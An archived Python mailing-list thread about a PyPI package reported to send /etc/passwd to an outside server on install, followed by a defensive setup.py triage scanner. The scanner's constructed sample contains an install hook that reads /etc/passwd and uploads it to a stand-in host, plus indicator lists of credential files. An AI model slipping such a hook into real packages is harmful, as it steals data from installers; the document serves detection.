That is a great observation, Bruno!

-Jackie

On Thu, May 4, 2017 at 8:08 PM, Bruno Rocha <rochacbruno@gmail.com> wrote:
Interesting detail, the mentioned package https://pypi.python.org/pypi/python-nation/1.0.1 was created and uploaded by Jacob Kaplan Moss, so I guess this is intended to be a POC, to show PyPI vulnerabilities or some Infosec experiment.

On Thu, May 4, 2017 at 8:41 PM, Bruno Rocha <rochacbruno@gmail.com> wrote:
Hi,

I just read this on reddit[0], a thread asking if PyPI packages are audited, and somebody pointed to `python-nation`[1], which is a harmful and useless module, installing itself and sending the `/etc/passwd` content to an external endpoint.

The app receiving the data is hosted at http://python-nation.herokuapp.com

and as the PSF mission [2] says 

The mission of the Python Software Foundation is to promote, protect, and advance the Python programming language

I wonder if there is some workgroup at PSF to handle this? And not only the specific case of `python-nation`, which should be deleted and the user banned maybe, but also to handle the audit of other packages?


[0] https://www.reddit.com/r/Python/comments/697da2/does_pypi_review_code_thats_uploaded/


Cheers,


_______________________________________________
PSF-Community mailing list
PSF-Community@python.org
https://mail.python.org/mailman/listinfo/psf-community
--
Jacqueline Kazil | @jackiekazil
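The thread describes a package that, at install time, reads `/etc/passwd` and posts it to an external endpoint, and asks how packages might be audited. As an added example (not code from this thread, from PyPI or from the PSF), the following is a small static triage check a reviewer could run over a distribution's `setup.py` before installing it: it parses the file with `ast` and flags the combination of indicators that the thread's description implies, namely string literals naming sensitive files, imports of network modules (which a build script has no ordinary reason to need), shell/subprocess calls, and a custom `cmdclass` install hook. The module lists, the two sample `setup.py` sources and the `.invalid` hostname are constructed for the example; the verdict thresholds are an assumption, not a published standard.

```python
"""Heuristic static triage of a setup.py (constructed example, not PyPI tooling)."""
import ast
from dataclasses import dataclass

# Assumed indicator lists; extend to taste. A setup.py that needs any of these
# at import time deserves a manual look before the package is installed.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", ".ssh/", ".aws/credentials", ".netrc")
NETWORK_MODULES = {"socket", "urllib", "urllib.request", "urllib2", "http.client",
                   "httplib", "requests", "ftplib", "smtplib"}
EXEC_OWNERS = {"os", "subprocess"}
EXEC_ATTRS = {"system", "popen", "Popen", "call", "check_output", "check_call", "run"}


@dataclass
class Finding:
    line: int
    kind: str
    detail: str


class SetupAuditor(ast.NodeVisitor):
    """Walks the AST once and records every indicator it meets."""

    def __init__(self):
        self.findings = []

    def _note(self, node, kind, detail):
        self.findings.append(Finding(node.lineno, kind, detail))

    def visit_Import(self, node):
        for alias in node.names:
            if alias.name in NETWORK_MODULES:
                self._note(node, "network-import", alias.name)
        self.generic_visit(node)

    def visit_ImportFrom(self, node):
        if (node.module or "") in NETWORK_MODULES:
            self._note(node, "network-import", node.module)
        self.generic_visit(node)

    def visit_Constant(self, node):
        # String literals naming credential or account files.
        if isinstance(node.value, str):
            for path in SENSITIVE_PATHS:
                if path in node.value:
                    self._note(node, "sensitive-path", node.value)
        self.generic_visit(node)

    def visit_Call(self, node):
        func = node.func
        # setup(..., cmdclass={...}) installs custom build/install hooks.
        if isinstance(func, ast.Name) and func.id == "setup":
            for kw in node.keywords:
                if kw.arg == "cmdclass":
                    self._note(node, "install-hook", "setup(cmdclass=...)")
        # os.system(...), subprocess.run(...), etc.
        if (isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name)
                and func.value.id in EXEC_OWNERS and func.attr in EXEC_ATTRS):
            self._note(node, "exec-call", f"{func.value.id}.{func.attr}")
        self.generic_visit(node)


def audit_setup_source(source: str) -> list:
    """Return the list of Finding objects for one setup.py source text."""
    try:
        tree = ast.parse(source)
    except SyntaxError as exc:
        # A setup.py that will not even parse is itself worth a look.
        return [Finding(exc.lineno or 0, "parse-error", str(exc))]
    auditor = SetupAuditor()
    auditor.visit(tree)
    return auditor.findings


def verdict(findings: list) -> str:
    """Assumed scoring: sensitive file access plus network code is the worst combination."""
    kinds = {f.kind for f in findings}
    if "sensitive-path" in kinds and "network-import" in kinds:
        return "high"
    return "medium" if kinds else "low"


# Constructed samples: a typical benign setup.py and one shaped like the behaviour
# described in the thread (hostname is a reserved .invalid name, it resolves nowhere).
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="demo", version="0.1", packages=find_packages(),
      url="https://example.invalid/demo")
'''

SUSPICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import urllib.request

class PostInstall(install):
    def run(self):
        install.run(self)
        data = open("/etc/passwd", "rb").read()
        urllib.request.urlopen("http://collector.example.invalid/upload", data=data)

setup(name="demo", version="0.1", cmdclass={"install": PostInstall})
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP), ("suspicious", SUSPICIOUS_SETUP)):
        found = audit_setup_source(src)
        print(f"{label}: verdict={verdict(found)}")
        for f in found:
            print(f"  line {f.line}: {f.kind} ({f.detail})")
```

Run it against a downloaded sdist's `setup.py` by passing the file contents to `audit_setup_source`. The check is a triage aid only: it reads the script without executing it, so it cannot see behaviour hidden behind obfuscation, and a `medium` hit on a legitimate package with a harmless `cmdclass` is expected. What the thread's example suggests is that the cheap combination of "reads a credential file" plus "imports a network client" inside a build script is rare enough in honest packages to justify a human review before `pip install` runs the script.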